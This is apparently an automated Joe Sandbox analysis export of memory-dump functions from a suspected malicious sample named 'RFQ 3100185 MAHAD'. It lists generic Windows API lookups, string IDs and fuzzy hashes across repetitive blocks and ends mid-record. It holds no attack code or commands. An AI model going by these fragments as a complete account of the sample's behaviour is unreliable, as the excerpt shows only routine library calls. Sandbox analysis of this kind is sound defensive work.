                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            • Opcode ID: 9919c633d7a79f064ce7271929babdf5e03ae4733dac4b87fe028b078b07bdc3
                                                            • Instruction ID: 654c1bbdf9c134cb92256ebc4cc58b9589fb05300dd9f9d8bdff033ae08a84e3
                                                            • Opcode Fuzzy Hash: 9919c633d7a79f064ce7271929babdf5e03ae4733dac4b87fe028b078b07bdc3
                                                            • Instruction Fuzzy Hash: 0811E771200208BEEF245F64CC49FEB376DFF89754F024118FA55E6091D2B6E851C724
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,007D2350,?), ref: 007D22A1
                                                            • GetProcAddress.KERNEL32(00000000), ref: 007D22A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RoInitialize$combase.dll
                                                            • API String ID: 2574300362-340411864
                                                            • Opcode ID: bdd0d4f1d67667da2e5dffb77fefb2e9426be271d4da2ae1c7473543dc58efef
                                                            • Instruction ID: 3d24d8132d27a99425002a38e307a29ecc0e579c2f316f0099de828c14e2a4b4
                                                            • Opcode Fuzzy Hash: bdd0d4f1d67667da2e5dffb77fefb2e9426be271d4da2ae1c7473543dc58efef
                                                            • Instruction Fuzzy Hash: 34E01A70694300EBDB105F70ED8DB197A64B750702F404420F10AE61A8CBF8D091DF65
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007D2276), ref: 007D2376
                                                            • GetProcAddress.KERNEL32(00000000), ref: 007D237D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RoUninitialize$combase.dll
                                                            • API String ID: 2574300362-2819208100
                                                            • Opcode ID: 6eef71c45705d5b9ac8f9b30c0629b442cb665e751b268c3250f5ada28457e90
                                                            • Instruction ID: 37e305bf330457fce9edc124d67b23a8cf8cb5cea5a8f3696758b89c9c39aefe
                                                            • Opcode Fuzzy Hash: 6eef71c45705d5b9ac8f9b30c0629b442cb665e751b268c3250f5ada28457e90
                                                            • Instruction Fuzzy Hash: E1E0BD70688300EBDB206F60FE0DB053A68B760702F510824F10DEA2B4CBFD94919E65
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: LocalTime__swprintf
                                                            • String ID: %.3d$WIN_XPe
                                                            • API String ID: 2070861257-2409531811
                                                            • Opcode ID: d642757dca5c1664d6ad1a80c2ba97b792442777511e0bbdb0634a0a63092fb2
                                                            • Instruction ID: b7326a33818cdcad5c7f4dc18d7b63e51f3c934a37cb8115bd575f99b97503b5
                                                            • Opcode Fuzzy Hash: d642757dca5c1664d6ad1a80c2ba97b792442777511e0bbdb0634a0a63092fb2
                                                            • Instruction Fuzzy Hash: 8DE012B180462CEBCB159750ED05DFA737CFF04745F5004D2F906E1110D6399BD4AA12
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,008121FB,?,008123EF), ref: 00812213
                                                            • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00812225
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetProcessId$kernel32.dll
                                                            • API String ID: 2574300362-399901964
                                                            • Opcode ID: b57204b5b6ac3c09df1689fc3d4d973aedd8eb4027ec9d0db8fcc28afa8ceabd
                                                            • Instruction ID: 2f7e6b6cc4d4f169f5629c31770911bde77721cac2ae7460fa75e880e6ca066b
                                                            • Opcode Fuzzy Hash: b57204b5b6ac3c09df1689fc3d4d973aedd8eb4027ec9d0db8fcc28afa8ceabd
                                                            • Instruction Fuzzy Hash: B2D0A7344007129FC7214F30F808649F6D8FF04304B01882AE866E2250D774D8C08650
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,007B42EC,?,007B42AA,?), ref: 007B4304
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007B4316
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            • Opcode ID: 2f69f77371584bea5baa04b61ef09711fdd578207a9229d9eb5ba221c0d07a98
                                                            • Instruction ID: d17fc4f550c97569f18b7d827dbb95dbd74ec495c8c4fbf2b14bfcc604a3da3c
                                                            • Opcode Fuzzy Hash: 2f69f77371584bea5baa04b61ef09711fdd578207a9229d9eb5ba221c0d07a98
                                                            • Instruction Fuzzy Hash: 0FD0A730400B129FC7204F20F80D745B6E4FB04301B05882AE451E3261D7B8CC808A50
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,007B41BB,007B4341,?,007B422F,?,007B41BB,?,?,?,?,007B39FE,?,00000001), ref: 007B4359
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007B436B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            • Opcode ID: 76ff3975dc54a8e6625c999d12b67cda6dd66881057dc9c829960d75dede66c4
                                                            • Instruction ID: ec37fb10dee086201320be01c518cdc243a9571d260c4e418358b5bd11664837
                                                            • Opcode Fuzzy Hash: 76ff3975dc54a8e6625c999d12b67cda6dd66881057dc9c829960d75dede66c4
                                                            • Instruction Fuzzy Hash: 27D0A7304007229FC7204F30F808B45B6D4FB11715B05882AE491E3251D7B8D8808A50
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,007F052F,?,007F06D7), ref: 007F0572
                                                            • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 007F0584
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                            • API String ID: 2574300362-1587604923
                                                            • Opcode ID: 6a0271449b93d7719cfdf6daad847d71f8eb48f4ac28ba8a147337c97878aad8
                                                            • Instruction ID: 85506e016bee09412dd7c5960e8fddaa33d5c0fbd62bd506aeae0bf3f30ed513
                                                            • Opcode Fuzzy Hash: 6a0271449b93d7719cfdf6daad847d71f8eb48f4ac28ba8a147337c97878aad8
                                                            • Instruction Fuzzy Hash: C2D05E30400B129BC7205F20F808A16B7E4BB04301B118859E951D2350DAB8C4848AA0
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(oleaut32.dll,?,007F051D,?,007F05FE), ref: 007F0547
                                                            • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 007F0559
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                            • API String ID: 2574300362-1071820185
                                                            • Opcode ID: 464212b6da2f3750df4b304cfcc9f39c7fc46358e93569e71f990a22af5bf3ea
                                                            • Instruction ID: 06724dedb77f2066b73eaec52977c8b486564881297603abd18ee18da7d33074
                                                            • Opcode Fuzzy Hash: 464212b6da2f3750df4b304cfcc9f39c7fc46358e93569e71f990a22af5bf3ea
                                                            • Instruction Fuzzy Hash: 04D0A734400B12DFC7309F20F808A15B6E4FB00301B11C85DE456D3351DAF8C8808A90
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0080ECBE,?,0080EBBB), ref: 0080ECD6
                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0080ECE8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 2574300362-1816364905
                                                            • Opcode ID: 9e4f0c2fd391880c00646b3281fea6a3f2af6fbbec7051e05fbf493d6a0faa8b
                                                            • Instruction ID: 0728ea75914cf85e04b4569d416871598499967be4fb16254b924d30718652b0
                                                            • Opcode Fuzzy Hash: 9e4f0c2fd391880c00646b3281fea6a3f2af6fbbec7051e05fbf493d6a0faa8b
                                                            • Instruction Fuzzy Hash: 01D0A730411723DFDB305F60FC49607B7E4FB00300B058C2AF855D2291DF74C8808650
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0080BAD3,00000001,0080B6EE,?,0084DC00), ref: 0080BAEB
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0080BAFD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            • Opcode ID: 02199a99437acf720cd86a8bf5c90adc31c65b56a5fa48d708b5088db3081384
                                                            • Instruction ID: 95fc6522b1b82de9ecf32e463df2d68933fd4f693abbc0cc1d85306da38d7dee
                                                            • Opcode Fuzzy Hash: 02199a99437acf720cd86a8bf5c90adc31c65b56a5fa48d708b5088db3081384
                                                            • Instruction Fuzzy Hash: F7D0A730810B129FC7705F20FC48B15B7D4FB00310B01882AE853E2290D774C880CA50
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00813BD1,?,00813E06), ref: 00813BE9
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00813BFB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: 3833f95358e3e9d8f3b4a64b0f77430bb28caa0fa6bc6ba1b22fa84c8162feaf
                                                            • Instruction ID: e486fa985e7208a95bbaa438f7513e0e06871360a614e48dd50b8abefcf77584
                                                            • Opcode Fuzzy Hash: 3833f95358e3e9d8f3b4a64b0f77430bb28caa0fa6bc6ba1b22fa84c8162feaf
                                                            • Instruction Fuzzy Hash: 95D0C7745007529FD7205F65F80864BFAF8FF55715B119819E456F2250D6B4D4C08F90
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8f6f5d89076fb9398dbf4fbf5bf601f04e684f52ebf70068bdf2cb5278214c0
                                                            • Instruction ID: 6c92323fb19a491bd61289bc1ad5680799aa7e0cd8fb2de98e177312afbf40d4
                                                            • Opcode Fuzzy Hash: f8f6f5d89076fb9398dbf4fbf5bf601f04e684f52ebf70068bdf2cb5278214c0
                                                            • Instruction Fuzzy Hash: 94C1A172A01259EFCB14DFA5C884EAEB7B4FF48700F104598EA05EB251D734EE41DBA0
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 0080AAB4
                                                            • CoUninitialize.OLE32 ref: 0080AABF
                                                              • Part of subcall function 007F0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007F027B
                                                            • VariantInit.OLEAUT32(?), ref: 0080AACA
                                                            • VariantClear.OLEAUT32(?), ref: 0080AD9D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                            • String ID:
                                                            • API String ID: 780911581-0
                                                            • Opcode ID: e54fa2b9ffa56d1337d54b0f7c974cc66faeeed06ce399efa681a6261da00c9e
                                                            • Instruction ID: 324939fb4bd9af22c5fcb9f455f13cc72b0298132ae3626b9a7179ccb059abe6
                                                            • Opcode Fuzzy Hash: e54fa2b9ffa56d1337d54b0f7c974cc66faeeed06ce399efa681a6261da00c9e
                                                            • Instruction Fuzzy Hash: F4A134352047019FDB54EF14C895B6AB7E5FF89720F158849FA969B3A2CB34ED00CB86
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            • Opcode ID: 08f21d8a0f61ae2fe7d91b5c1507f09e44d372997e381b66339b2cb6b3df716c
                                                            • Instruction ID: 8fa1abeb5baf5d5cfd4ff2aee95e9822b077bf453161c3b0b18a8a0560fa0002
                                                            • Opcode Fuzzy Hash: 08f21d8a0f61ae2fe7d91b5c1507f09e44d372997e381b66339b2cb6b3df716c
                                                            • Instruction Fuzzy Hash: 7E519232601386EBDB249F67D495B6EB3E5AF4D310F20881FE756CB2D1EB7898408705
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                            • String ID:
                                                            • API String ID: 3877424927-0
                                                            • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                            • Instruction ID: f08e3506fee7f4878a3382b836ace49c4e830b6900ef7e97cbf7cd1b9b7ecd16
                                                            • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                            • Instruction Fuzzy Hash: 5051A1B0A00605EBDB249FA9888566E7BB5AF40330F24872BF835963D0D779DF50DB52
                                                            APIs
                                                            • GetWindowRect.USER32(012665C8,?), ref: 0081C544
                                                            • ScreenToClient.USER32(?,00000002), ref: 0081C574
                                                            • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0081C5DA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID:
                                                            • API String ID: 3880355969-0
                                                            • Opcode ID: 54513ef5dc11e73c22dd0484e247184cdaa7e7105d2aa8cf99e0c11767a47b23
                                                            • Instruction ID: 0036ccf572d5d192cb9a4cb3b8ac53204bcbec010f25154f48d9031956db8cd6
                                                            • Opcode Fuzzy Hash: 54513ef5dc11e73c22dd0484e247184cdaa7e7105d2aa8cf99e0c11767a47b23
                                                            • Instruction Fuzzy Hash: 98511B75900204AFCF10DF68D885AEE77AAFF65720F108659F969DB291D730E981CB90
                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 007EC462
                                                            • __itow.LIBCMT ref: 007EC49C
                                                              • Part of subcall function 007EC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 007EC753
                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 007EC505
                                                            • __itow.LIBCMT ref: 007EC55A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow
                                                            • String ID:
                                                            • API String ID: 3379773720-0
                                                            • Opcode ID: b45460fc54ff5e456c8632775ed76c7a432036256bdee54eb738498a15e64829
                                                            • Instruction ID: b21b84a051b72fd894be590c48b917114cf43ce00014b44c5d95044d73ab7098
                                                            • Opcode Fuzzy Hash: b45460fc54ff5e456c8632775ed76c7a432036256bdee54eb738498a15e64829
